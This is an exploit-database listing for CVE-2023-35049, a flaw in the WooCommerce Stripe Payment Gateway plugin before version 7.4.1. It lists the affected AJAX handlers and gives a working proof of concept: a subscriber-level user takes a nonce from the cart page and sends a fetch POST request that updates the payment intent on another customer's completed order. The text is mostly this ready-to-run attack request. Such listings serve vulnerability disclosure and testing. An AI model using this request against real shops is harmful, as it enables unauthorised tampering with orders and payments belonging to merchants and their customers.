Exploit for WooCommerce Stripe Payment Gateway < 7.4.1 - Subscriber+ Order Intent Update CVE-2023-35049

Name: Exploit for WooCommerce Stripe Payment Gateway < 7.4.1 - Subscriber+ Order Intent Update CVE-2023-35049
Rating: 5 (152 reviews)

2023-06-26 | CVSS 6.5

## https://sploitus.com/exploit?id=WPEX-ID:BDE23A65-476D-411B-A0D3-F2B9D7112C01
Affected functions:
create_payment_intent_ajax
update_payment_intent_ajax
save_upe_appearance_ajax
update_order_status_ajax
update_failed_order_ajax

As a subscriber, go to the cart page (ie https://example/cart/) and grab the updateFailedOrderNonce nonce, then perform the below request (42 being a Completed Order ID)

fetch("/cart/?wc-ajax=wc_stripe_update_failed_order", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": 'order_id=42&_wpnonce=NONCE&intent_id=1',
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));